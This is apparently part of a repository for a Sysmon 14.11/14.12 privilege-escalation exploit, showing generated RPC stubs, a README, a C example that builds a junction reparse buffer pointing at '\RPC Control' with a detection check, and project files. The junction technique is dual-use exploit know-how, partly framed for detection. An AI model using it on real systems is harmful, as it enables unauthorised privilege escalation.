typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_TYPE_FORMAT_STRING;

typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_PROC_FORMAT_STRING;

typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
    {
    long          Pad;
    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_EXPR_FORMAT_STRING;


static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};

static const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = 
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};


extern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;
extern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;
extern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;

/* Standard interface: DefaultIfName, ver. 1.0,
   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */


extern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;

extern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;

static const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =
    {
    sizeof(RPC_SERVER_INTERFACE),
    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
    0,
    0,
    0,
    &DefaultIfName_ServerInfo,
    0x06000000
    };
RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;

extern const MIDL_STUB_DESC DefaultIfName_StubDesc;


#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif

static const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =
    {
        0,
        {

	/* Procedure Proc0 */

			0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/*  2 */	NdrFcLong( 0x0 ),	/* 0 */
/*  6 */	NdrFcShort( 0x0 ),	/* 0 */
/*  8 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
/* 10 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 12 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
/* 14 */	NdrFcShort( 0x0 ),	/* 0 */
/* 16 */	NdrFcShort( 0x8 ),	/* 8 */
/* 18 */	0x44,		/* Oi2 Flags:  has return, has ext, */
			0x1,		/* 1 */
/* 20 */	0xa,		/* 10 */
			0x1,		/* Ext Flags:  new corr desc, */
/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
/* 24 */	NdrFcShort( 0x0 ),	/* 0 */
/* 26 */	NdrFcShort( 0x0 ),	/* 0 */
/* 28 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Return value */

/* 30 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 32 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
/* 34 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure Proc1 */

/* 36 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 38 */	NdrFcLong( 0x0 ),	/* 0 */
/* 42 */	NdrFcShort( 0x1 ),	/* 1 */
/* 44 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
/* 46 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 48 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
/* 50 */	NdrFcShort( 0x8 ),	/* 8 */
/* 52 */	NdrFcShort( 0x0 ),	/* 0 */
/* 54 */	0x42,		/* Oi2 Flags:  clt must size, has ext, */
			0x2,		/* 2 */
/* 56 */	0xa,		/* 10 */
			0x1,		/* Ext Flags:  new corr desc, */
/* 58 */	NdrFcShort( 0x0 ),	/* 0 */
/* 60 */	NdrFcShort( 0x0 ),	/* 0 */
/* 62 */	NdrFcShort( 0x0 ),	/* 0 */
/* 64 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter arg_0 */

/* 66 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 68 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
/* 70 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter arg_1 */

/* 72 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 74 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
/* 76 */	NdrFcShort( 0x4 ),	/* Type Offset=4 */

			0x0
        }
    };

static const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =
    {
        0,
        {
			NdrFcShort( 0x0 ),	/* 0 */
/*  2 */	
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/*  4 */	
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */

			0x0
        }
    };

static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
    {
    0,
    36
    };


static const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =
    {
    NdrServerCall2,
    NdrServerCall2,
    0
    };
static const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = 
    {
    2,
    (RPC_DISPATCH_FUNCTION*)DefaultIfName_table
    };


#endif /* defined(_M_AMD64)*/



/* this ALWAYS GENERATED file contains the RPC server stubs */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)




#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif


#include "ndr64types.h"
#include "pshpack8.h"


typedef 
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag7_t;
extern const __midl_frag7_t __midl_frag7;

typedef 
struct _NDR64_POINTER_FORMAT
__midl_frag6_t;
extern const __midl_frag6_t __midl_frag6;

typedef 
NDR64_FORMAT_CHAR
__midl_frag5_t;
extern const __midl_frag5_t __midl_frag5;

typedef 
struct 
{
    struct _NDR64_PROC_FORMAT frag1;
    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
    struct _NDR64_PARAM_FORMAT frag3;
    struct _NDR64_PARAM_FORMAT frag4;
}
__midl_frag4_t;
extern const __midl_frag4_t __midl_frag4;

typedef 
struct 
{
    struct _NDR64_PROC_FORMAT frag1;
    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
    struct _NDR64_PARAM_FORMAT frag3;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;

typedef 
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;

static const __midl_frag7_t __midl_frag7 =
{ 
/* *wchar_t */
    { 
    /* *wchar_t */
        0x64,    /* FC64_CONF_WCHAR_STRING */
        { 
        /* *wchar_t */
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0
        },
        (NDR64_UINT16) 2 /* 0x2 */
    }
};

static const __midl_frag6_t __midl_frag6 =
{ 
/* *wchar_t */
    0x20,    /* FC64_RP */
    (NDR64_UINT8) 0 /* 0x0 */,
    (NDR64_UINT16) 0 /* 0x0 */,
    &__midl_frag7
};

static const __midl_frag5_t __midl_frag5 =
0x5    /* FC64_INT32 */;

static const __midl_frag4_t __midl_frag4 =
{ 
/* Proc1 */
    { 
    /* Proc1 */      /* procedure Proc1 */
        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */
        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */
        (NDR64_UINT32) 8 /* 0x8 */,
        (NDR64_UINT32) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 2 /* 0x2 */,
        (NDR64_UINT16) 8 /* 0x8 */
    },
    { 
    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
        { 
        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
            0x72,    /* FC64_BIND_PRIMITIVE */
            (NDR64_UINT8) 0 /* 0x0 */,
            0 /* 0x0 */,   /* Stack offset */
            (NDR64_UINT8) 0 /* 0x0 */,
            (NDR64_UINT8) 0 /* 0x0 */
        },
        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */
    },
    { 
    /* arg_0 */      /* parameter arg_0 */
        &__midl_frag5,
        { 
        /* arg_0 */
            0,
            0,
            0,
            1,
            0,
            0,
            1,
            1,
            0,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* [in], Basetype, ByValue */
        (NDR64_UINT16) 0 /* 0x0 */,
        8 /* 0x8 */,   /* Stack offset */
    },
    { 
    /* arg_1 */      /* parameter arg_1 */
        &__midl_frag7,
        { 
        /* arg_1 */
            1,
            1,
            0,
            1,
            0,
            0,
            0,
            0,
            1,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* MustSize, MustFree, [in], SimpleRef */
        (NDR64_UINT16) 0 /* 0x0 */,
        16 /* 0x10 */,   /* Stack offset */
    }
};

static const __midl_frag2_t __midl_frag2 =
{ 
/* Proc0 */
    { 
    /* Proc0 */      /* procedure Proc0 */
        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */
        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */
        (NDR64_UINT32) 0 /* 0x0 */,
        (NDR64_UINT32) 8 /* 0x8 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 1 /* 0x1 */,
        (NDR64_UINT16) 8 /* 0x8 */
    },
    { 
    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
        { 
        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
            0x72,    /* FC64_BIND_PRIMITIVE */
            (NDR64_UINT8) 0 /* 0x0 */,
            0 /* 0x0 */,   /* Stack offset */
            (NDR64_UINT8) 0 /* 0x0 */,
            (NDR64_UINT8) 0 /* 0x0 */
        },
        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */
    },
    { 
    /* long */      /* parameter long */
        &__midl_frag5,
        { 
        /* long */
            0,
            0,
            0,
            0,
            1,
            1,
            1,
            1,
            0,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* [out], IsReturn, Basetype, ByValue */
        (NDR64_UINT16) 0 /* 0x0 */,
        8 /* 0x8 */,   /* Stack offset */
    }
};

static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;


#include "poppack.h"


static const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =
    {
    &__midl_frag2,
    &__midl_frag4
    };


static const MIDL_STUB_DESC DefaultIfName_StubDesc = 
    {
    (void *)& DefaultIfName___RpcServerInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    0,
    0,
    0,
    0,
    0,
    sysmon__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x60001, /* Ndr library version */
    0,
    0x801026e, /* MIDL Version 8.1.622 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x2000001, /* MIDL flag */
    0, /* cs routines */
    (void *)& DefaultIfName_ServerInfo,   /* proxy/server info */
    0
    };

static const RPC_DISPATCH_FUNCTION DefaultIfName_NDR64__table[] =
    {
    NdrServerCallAll,
    NdrServerCallAll,
    0
    };
static const RPC_DISPATCH_TABLE DefaultIfName_NDR64__v1_0_DispatchTable = 
    {
    2,
    (RPC_DISPATCH_FUNCTION*)DefaultIfName_NDR64__table
    };

static const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = 
    {
    {
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
    sysmon__MIDL_ProcFormatString.Format,
    DefaultIfName_FormatStringOffsetTable,
    sysmon__MIDL_TypeFormatString.Format,
    0,
    0,
    0
    }
    ,{
    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
    (RPC_DISPATCH_TABLE*)&DefaultIfName_NDR64__v1_0_DispatchTable,
    0 ,
    (unsigned short *) DefaultIfName_Ndr64ProcTable,
    0,
    0,
    0,
    0
    }
    };


static const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = 
    {
    (SERVER_ROUTINE)Proc0,
    (SERVER_ROUTINE)Proc1
    };

static const MIDL_SERVER_INFO DefaultIfName_ServerInfo = 
    {
    &DefaultIfName_StubDesc,
    DefaultIfName_ServerRoutineTable,
    sysmon__MIDL_ProcFormatString.Format,
    (unsigned short *) DefaultIfName_FormatStringOffsetTable,
    0,
    (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax,
    2,
    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo
    };
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif


#endif /* defined(_M_AMD64)*/



================================================
FILE: v2/README.md
================================================
Exploit for Sysmon 14.11/14.12. It also works on versions below 14.11, but less reliably, because this variant has to win a race against Sysmon.

![PoC](poc.PNG)
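How the junction that the exploit sets on C:\Sysmon is laid out, and how a defender can recognise it, as an added example that is not part of this repository. It builds the same IO_REPARSE_TAG_MOUNT_POINT payload that CreateJunction() in main.cpp hands to FSCTL_SET_REPARSE_POINT, parses it back the way a scanner reading FSCTL_GET_REPARSE_POINT output would, and flags a substitute name that points outside the filesystem namespace (\RPC Control rather than \??\ or \Device\). It is plain C so it compiles anywhere; the field layout follows the REPARSE_DATA_BUFFER definition in def.h, while the struct names, the function names and the "normal prefix" heuristic are this example's own assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IO_REPARSE_TAG_MOUNT_POINT 0xA0000003UL
#define REPARSE_HDR_SIZE 8      /* ReparseTag + ReparseDataLength + Reserved */

typedef uint16_t WCHAR16;       /* UTF-16 code unit; wchar_t is 4 bytes on Linux, so it is avoided */

/* Same byte layout as REPARSE_DATA_BUFFER with MountPointReparseBuffer in def.h: 16 header
 * bytes, then PathBuffer. A flexible array member stands in for def.h's PathBuffer[1]. */
typedef struct {
    uint32_t ReparseTag;
    uint16_t ReparseDataLength;
    uint16_t Reserved;
    uint16_t SubstituteNameOffset, SubstituteNameLength, PrintNameOffset, PrintNameLength;
} MOUNT_POINT_HDR;
typedef struct { MOUNT_POINT_HDR h; WCHAR16 PathBuffer[]; } MOUNT_POINT_REPARSE;

/* Build the FSCTL_SET_REPARSE_POINT payload for a junction whose substitute name is `target`
 * (an NT path: "\??\C:\Dir" normally, "\RPC Control" in the exploit). Mirrors CreateJunction():
 * ReparseDataLength = four USHORT name fields (8) + both names + two UTF-16 NULs (4), which is
 * the "+ 12" in main.cpp. ASCII input only; the caller frees the result. */
MOUNT_POINT_REPARSE *build_mount_point(const char *target, const char *printname, size_t *total_out)
{
    size_t tchars = strlen(target), pchars = strlen(printname);
    size_t data_len = 8 + (tchars + 1) * 2 + (pchars + 1) * 2;
    if (data_len > UINT16_MAX) return NULL;
    size_t total = REPARSE_HDR_SIZE + data_len;
    MOUNT_POINT_REPARSE *rb = calloc(1, total);           /* calloc writes both terminating NULs */
    if (!rb) return NULL;
    rb->h.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    rb->h.ReparseDataLength = (uint16_t)data_len;
    rb->h.SubstituteNameOffset = 0;
    rb->h.SubstituteNameLength = (uint16_t)(tchars * 2);
    rb->h.PrintNameOffset = (uint16_t)((tchars + 1) * 2);  /* just past the substitute name's NUL */
    rb->h.PrintNameLength = (uint16_t)(pchars * 2);
    for (size_t i = 0; i < tchars; i++) rb->PathBuffer[i] = (unsigned char)target[i];
    for (size_t i = 0; i < pchars; i++) rb->PathBuffer[tchars + 1 + i] = (unsigned char)printname[i];
    if (total_out) *total_out = total;
    return rb;
}

/* Parse a raw reparse buffer as FSCTL_GET_REPARSE_POINT returns it and copy the substitute name
 * (narrowed to ASCII; other code units become '?') into `out`. Rejects anything that is not a
 * mount point or whose offsets/lengths run past the buffer. */
bool parse_mount_point(const uint8_t *raw, size_t raw_len, char *out, size_t out_cap)
{
    MOUNT_POINT_HDR h;
    if (raw_len < sizeof h) return false;
    memcpy(&h, raw, sizeof h);                 /* no unaligned access on an arbitrary byte buffer */
    if (h.ReparseTag != IO_REPARSE_TAG_MOUNT_POINT || h.ReparseDataLength < 8) return false;
    if ((size_t)h.ReparseDataLength + REPARSE_HDR_SIZE > raw_len) return false;
    size_t path_bytes = h.ReparseDataLength - 8;
    size_t off = h.SubstituteNameOffset, len = h.SubstituteNameLength;
    if (off % 2 || len % 2 || off + len > path_bytes) return false;
    size_t nchars = len / 2;
    if (nchars + 1 > out_cap) return false;
    for (size_t i = 0; i < nchars; i++) {
        WCHAR16 cu;
        memcpy(&cu, raw + sizeof h + off + 2 * i, sizeof cu);
        out[i] = cu < 0x80 ? (char)cu : '?';
    }
    out[nchars] = '\0';
    return true;
}

/* Heuristic (this example's assumption): junctions made by normal tooling target a volume, so
 * the substitute name begins with "\??\" or "\Device\". Anything else, such as "\RPC Control",
 * resolves inside the object manager namespace instead of a filesystem, which is what lets a
 * file create under the junction land on an object-manager symlink. */
bool mount_point_target_is_suspicious(const char *target)
{
    return strncmp(target, "\\??\\", 4) != 0 && strncmp(target, "\\Device\\", 8) != 0;
}

int main(void)
{
    size_t n = 0;
    char target[260];
    MOUNT_POINT_REPARSE *rb = build_mount_point("\\RPC Control", "", &n);
    if (rb && parse_mount_point((const uint8_t *)rb, n, target, sizeof target))
        printf("%zu-byte mount point -> %s (%s)\n", n, target,
               mount_point_target_is_suspicious(target) ? "suspicious" : "normal");
    free(rb);
    return 0;
}
```

On Windows the buffer returned by build_mount_point is what DeviceIoControl(FSCTL_SET_REPARSE_POINT) expects, and parse_mount_point accepts the output of FSCTL_GET_REPARSE_POINT on a directory opened with FILE_FLAG_OPEN_REPARSE_POINT; a check of Sysmon's ArchiveDirectory that reports a suspicious target is one concrete detection for this technique.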


================================================
FILE: v2/SysmonEoP/SysmonEOP.sln
================================================

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30717.126
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SysmonEOP", "SysmonEOP.vcxproj", "{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.ActiveCfg = Debug|x64
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.Build.0 = Debug|x64
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.ActiveCfg = Debug|Win32
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.Build.0 = Debug|Win32
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.ActiveCfg = Release|x64
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.Build.0 = Release|x64
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.ActiveCfg = Release|Win32
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {EA809E7C-ABAC-45B5-BE5B-2F48BFC601DA}
	EndGlobalSection
EndGlobal


================================================
FILE: v2/SysmonEoP/SysmonEOP.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
      <Configuration>Debug</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|Win32">
      <Configuration>Release</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Debug|x64">
      <Configuration>Debug</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|x64">
      <Configuration>Release</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
  </ItemGroup>
  <PropertyGroup Label="Globals">
    <VCProjectVersion>16.0</VCProjectVersion>
    <Keyword>Win32Proj</Keyword>
    <ProjectGuid>{fac6a4f5-2e86-4ef0-a787-669b2a2f28af}</ProjectGuid>
    <RootNamespace>SysmonEOP</RootNamespace>
    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
  </ImportGroup>
  <ImportGroup Label="Shared">
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <LinkIncremental>true</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <LinkIncremental>false</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <LinkIncremental>true</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <LinkIncremental>false</LinkIncremental>
  </PropertyGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
      <ProgramDataBaseFileName />
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
    <BuildLog>
      <Path />
    </BuildLog>
  </ItemDefinitionGroup>
  <ItemGroup>
    <ClCompile Include="main.cpp" />
    <ClCompile Include="sysmon_c.c" />
  </ItemGroup>
  <ItemGroup>
    <Midl Include="sysmon.idl" />
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="def.h" />
    <ClInclude Include="resource.h" />
  </ItemGroup>
  <ItemGroup>
    <ResourceCompile Include="resource.rc" />
  </ItemGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <ImportGroup Label="ExtensionTargets">
  </ImportGroup>
</Project>

================================================
FILE: v2/SysmonEoP/SysmonEOP.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <Filter Include="Source Files">
      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
    </Filter>
    <Filter Include="Header Files">
      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
    </Filter>
    <Filter Include="Resource Files">
